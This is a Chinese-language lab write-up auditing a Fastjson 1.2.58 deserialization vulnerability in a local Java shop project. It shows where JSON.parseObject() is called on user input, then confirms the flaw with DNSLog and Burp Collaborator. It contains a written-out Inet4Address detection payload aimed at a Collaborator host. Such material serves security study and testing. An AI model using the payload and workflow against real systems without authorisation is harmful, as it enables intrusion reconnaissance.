1.1 Fastjson反序列化
代码审计
本项目引入的Fastjson版本为1.2.58,该版本存在反序列化漏洞。
已确定了Fastjson版本存在问题,进一步寻找触发Fastjson的漏洞点。
我们关注两个函数JSON.parse()和JSON.parseObject(),并且执行函数内参数用户可控
Edit-Find->Find in path
全局搜索两个关键字,发现本项目存在JSON.parseObject(),如下图所示:
在ProductController.java中使用到了上诉关键词
在151、257、281行均调用了JSON.parseObject()方法,则这几处均存在反序列化。
黑盒验证:
够着url及参数:
方法一: 通过对各个页面的访问并抓包,找到propertyAddJson参数
方法二: 通过抓包,观察数据格式构造url
这里我们优先结合方法一,方法二更适合get请求
构造url:通过代码中的admin/product http://127.0.0.1:8088/tmall/admin/product
结合上述访问在网站中快速定位到页面
”添加一件产品“功能处是调用上述product方法
下面属性值就是json数据
定位位置后,尝试payload
虽然响应包报错,但是dnslog已经出现访问
上面是可以出网的情况,下面则是不出网漏洞验证
在内网环境中,无法利用互联网的DNSlog进行漏洞验证。我们可以使用BurpSuite中的Burp Collaborator client功能来进行验证。该功能需使用BurpSuite专业版本。
①、打开BurpSuite,点击左上角Burp-Burp Collaborator client进入该功能,如下图所示:
②、点击Copy to clipboar后,你会获取到一个测试地址,拼凑成漏洞验证POC:{"@type":"java.net.Inet4Address","val":"mlbqit7ocev29vd3k5w205zqchi86x.burpcollaborator.net"},然后将其粘贴到propertyJson字段中,点击发送数据包。稍等一会,多点几次poll now,可以看到Burp Collaborator client接收到了探测信息,如下图所示:
至此,Fastjson漏洞验证之旅已结束,通过DNSLog方式,我们证明了该地方存在Fastjson反序列化漏洞。
